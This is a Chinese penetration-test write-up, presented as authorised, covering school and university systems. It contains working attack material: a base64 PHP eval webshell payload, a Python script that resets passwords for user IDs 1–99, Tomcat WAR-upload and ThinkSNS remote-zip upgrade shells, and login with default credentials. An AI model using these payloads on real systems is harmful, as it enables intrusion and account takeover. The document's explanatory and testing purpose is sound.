1. 首页
  2. 渗透测试

记一次授权渗透测试与智慧校园一轮游(下卷)

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

文章首发于火线Zone社区(https://zone.huoxian.cn/)

上卷我们聊完了智慧校园,接下来我们就接着聊某次授权渗透测试的部分。

三、某次授权渗透测试部分小记

1.帝国CMS 后台GETSHELL

记一次授权渗透测试与智慧校园一轮游(下卷)

图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的信息收集,发现那个版本好像有一个getshell,不过是后台的,尝试一下,账号admin密码123456,发现对了之后GetShell了。

<script language="php">echobase64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjb WQnXSk7Pz4=");</script>//这个是当时的payload

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

点击提交后访问http://xxxxx:port/e/admin/Ri3nSecurity_Team.php

然后使用菜刀连接就可以了。

记一次授权渗透测试与智慧校园一轮游(下卷)

不过需要注意的是,这里执行cmd命令会发现其实不是administrator,需要提权,因为当时除了这里其他地方已经获取到了administrator权限, 所以这个shell就没有提权。

记一次授权渗透测试与智慧校园一轮游(下卷)

2.某营销系统综合实训室逻辑漏洞

记一次授权渗透测试与智慧校园一轮游(下卷)

以下是我当时挖到漏洞后写的Poc:

# __author__ ‘R3inS3curity.UzJu’
# Creat time 2020/7/17 20:14
import requests
import re
from bs4 import BeautifulSoup

def Hacked_Testing():
for a in range(1,100):
r = ‘http://xxx:port/updaXte.dXo?methXod=saXve’
cookie1s = {‘JSESSIONID’:’DCBDA30F80F1DEA2X1123C8080FBE’,
‘submenuheader’:’-1c’}
datas = {
‘id’:a,
‘password’:’123456789′,
‘repassword’:’123456789′,
‘stuNo’:’200107′,
‘realName’:’%E4%B1231%A3′,
‘sex’:’1′,
‘schollTime’: ‘2019-03-08’,
‘tel’: ‘%3Cscr23rt123t%3E’,
‘address’: ‘%3Cscript%3E1alert%281%23script%3E’,
‘birthPlace’: ‘%3Cscrip123Fscript%3E’,
‘idNumber’: ‘%3Cscript%3Eale123C%2Fscript%3E’,
‘head_img’: ‘%2Fuploadfiles1%123lt_head.gif’,
‘x=’: ’50’,
‘y’: ‘6’
}
result = requests.post(url=r, cookies=cookie1s, data=datas)
soup = BeautifulSoup(result.text, features=”html.parser”)
print(‘[+]Current ID is:{},UserName is:{}’.format(a, soup.td.text))
Hacked_Testing()

当时的漏洞截图

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

这个ID就是用户的ID,修改这个就可以重置任何用户的密码^ ^ 然后写脚本跑。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

尝试将修改的密码,进行登录,可以登录成功。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

3.C-xxxx打印服务系统未授权访问

记一次授权渗透测试与智慧校园一轮游(下卷)

只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了。

记一次授权渗透测试与智慧校园一轮游(下卷)

4.tomcat弱口令GETSHELL

记一次授权渗透测试与智慧校园一轮游(下卷)

这个漏洞主要就是tomcat-user.xml的配置问题导致的,然后进到manger后上传shell的war包就可以了

记一次授权渗透测试与智慧校园一轮游(下卷)

这个账号admin 密码为空,然后上传war包就可以getshell了。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

打包好之后上传就可以啦

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

5.某卓越营销实践系统SQL注入getshell

记一次授权渗透测试与智慧校园一轮游(下卷)

这个漏洞没啥好说的,上去sqlmap一把嗦就完事了(其实这里还有一个存储型XSS)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)
记一次授权渗透测试与智慧校园一轮游(下卷)

然后远程链接服务器就可以了

记一次授权渗透测试与智慧校园一轮游(下卷)

这个服务器改端口了,本来是3389远程连接的,改成了3300,接下来就简单说一下,怎么找到3300这个端口的。

Cmd输入tasklist /svc然后找到TermService找到PID2416

记一次授权渗透测试与智慧校园一轮游(下卷)

然后使用netstat -aon|findstr “2416”找到对应的PID就能找到远程端口。

记一次授权渗透测试与智慧校园一轮游(下卷)

6.ThinkSNS管理员弱口令后台GetShell

记一次授权渗透测试与智慧校园一轮游(下卷)

弱口令登录,后台getshell

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

漏洞复现地址:http://xxx:port/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

记一次授权渗透测试与智慧校园一轮游(下卷)

由于配置问题,访问/data/upgrade就可以看到目录下的文件,data目录也是如此。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

将数据包的act改成setp2和upurl改成filename=UzJu.zip

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

然后去访问这个Php。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

然后正常获取权限就行,以下是漏洞代码的位置。

漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

记一次授权渗透测试与智慧校园一轮游(下卷)

46行处,升级时调用check函数升级通过C(‘UPURL’).’?v=’.C(‘VERSION’)获取升级链接

记一次授权渗透测试与智慧校园一轮游(下卷)

在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验,存在逻辑问题,直接构造url payload下载。

此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录。

记一次授权渗透测试与智慧校园一轮游(下卷)

7.文件共享信息泄露

记一次授权渗透测试与智慧校园一轮游(下卷)

全是DB与数据

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

8.某卓越市场营销模拟平台垂直越权

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

登录不同的账号,就会有不同的路径,然后尝试改一改路径,发现可以越权。

记一次授权渗透测试与智慧校园一轮游(下卷)

记一次授权渗透测试与智慧校园一轮游(下卷)

上面两张图不难发现,我通过修改不同的路径,然后越权到了不同的权限,学生—>老师。

记一次授权渗透测试与智慧校园一轮游(下卷)

内网服务器信息收集,随便放几张图吧,太敏感了。

记一次授权渗透测试与智慧校园一轮游(下卷)

四、结尾

在测试中也拿到了财务服务器的权限,但是由于限制,不出现在本文中。

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/3631.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息